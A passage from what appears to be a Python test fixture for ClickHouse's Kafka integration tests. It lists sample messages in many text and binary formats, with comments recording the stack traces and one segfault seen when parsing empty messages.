'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'CustomSeparated' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
},
'Template' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
],
'extra_settings': ", format_template_row='template_row.format'"
},
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
